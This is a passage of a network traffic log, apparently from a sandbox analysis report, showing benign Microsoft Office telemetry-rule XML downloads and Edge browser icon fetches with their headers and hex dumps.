                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                        x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125335Z-1746fd949bdlnsqphC1EWRurw0000000013g000000005xrg
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        62192.168.2.74978913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                        x-ms-request-id: 4da954f1-f01e-003f-58cd-45d19d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bd9x4mhhC1EWRb76n000000018g00000000740a
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        63192.168.2.74979213.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 1966
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                        ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                        x-ms-request-id: fe45fbd2-101e-0037-27e8-45c4a8000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bdl6zq5hC1EWRf3ws00000000y0000000004vny
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        64192.168.2.74979013.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 1751
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                        ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                        x-ms-request-id: 2cfb8a98-d01e-0047-1ae8-45b76c000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bdlnsqphC1EWRurw0000000013g000000005xrq
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        65192.168.2.74979313.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                        ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                        x-ms-request-id: d852e5ff-501e-005d-1940-469803000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bddgsvjhC1EWRum2c00000001c000000000c63n
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        66192.168.2.74979413.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 2008
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                        ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                        x-ms-request-id: 6102d7ee-101e-0037-7240-46c4a8000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bdqpttnhC1EWRe1wg00000000xg000000009fyn
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        67192.168.2.74979113.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:35 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 2229
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                        ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                        x-ms-request-id: d893de37-501e-0056-2de8-458077000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bdb8xvchC1EWRmbd4000000012000000000c21k
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        68192.168.2.74979513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                        x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125336Z-1746fd949bdb8xvchC1EWRmbd40000000140000000009fzn
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        69192.168.2.74978813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:36 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:37 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                        x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125337Z-1746fd949bdlqd7fhC1EWR6vt000000001g0000000000u65
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
